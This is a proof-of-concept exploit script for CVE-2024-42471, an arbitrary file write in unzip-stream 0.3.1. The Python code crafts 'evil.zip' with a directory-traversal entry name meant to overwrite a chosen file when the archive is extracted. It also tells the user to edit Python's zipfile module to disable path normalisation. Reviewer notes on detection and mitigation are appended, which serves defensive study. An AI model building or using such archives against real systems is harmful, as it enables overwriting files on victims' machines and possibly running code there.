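# Exploit Title: unzip-stream 0.3.1 - Arbitrary File Write
# Date: 18th April, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Software link: https://github.com/mhr3/unzip-stream
# Version: unzip-stream 0.3.1
# Tested on: Ubuntu
# CVE: CVE-2024-42471

# NB: Python's built-in `zipfile` module has limitations on the `arcname` parameter.
# To bypass this restriction, edit the module's source code (`zipfile.py`) and comment out the following line:
# arcname = os.path.normpath(os.path.splitdrive(arcname)[1])
# For a more detailed explanation, feel free to check out my blog post here: https://themcsam.github.io/posts/unzip-stream-PoC/

# Reviewer notes:
# - What this script produces: a single-entry archive whose stored entry name
#   starts with a directory ("hack/") followed by a run of ".." segments and a
#   target path. An extractor that joins the entry name onto its destination
#   directory without confining the result writes the entry outside that
#   directory (CWE-22, path traversal / "zip slip").
# - With an unmodified `zipfile` module the arcname is passed through
#   os.path.normpath (the line quoted above), so the stored entry name is not
#   the literal string built below. Inspect the result with
#   `zipfile.ZipFile(zip_name).namelist()` before drawing conclusions from a
#   test run.
# - Detection: before extraction, list the entry names of incoming archives and
#   flag any that are absolute or contain a ".." path component anywhere in the
#   name, not only at the start. On hosts, alert on file writes by the
#   extracting process outside its configured destination directory.
# - Mitigation: move to an unzip-stream release that carries the fix for
#   CVE-2024-42471. In any extraction code, resolve each entry path against the
#   destination directory and reject entries whose resolved path is not inside
#   it; run extraction with the least filesystem privilege that works.

import zipfile
import os
import sys

file_path = './poc'  # Change to the file which contains the data to write
zip_name = 'evil.zip'
path_to_overwrite_file = 'home/mcsam/pocc'  # Change to target file to write/overwrite

# Stop early when the payload file is missing. The failure is reported on
# stderr with a non-zero status so a calling test harness does not mistake it
# for a successful run (a bare sys.exit() exits with status 0).
if not os.path.isfile(file_path):
    print(f"Error: File '{file_path}' does not exist.", file=sys.stderr)
    sys.exit(1)

# Store the payload under the traversal-style entry name. The context manager
# closes the archive, which writes the central directory.
with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as zipf:
    zipf.write(
        file_path,
        arcname=f'hack/../../../../../../../../../../../../../../{path_to_overwrite_file}',
    )

# Reported only after the archive has been closed.
print(f"File '{file_path}' has been zipped as '{zip_name}'.")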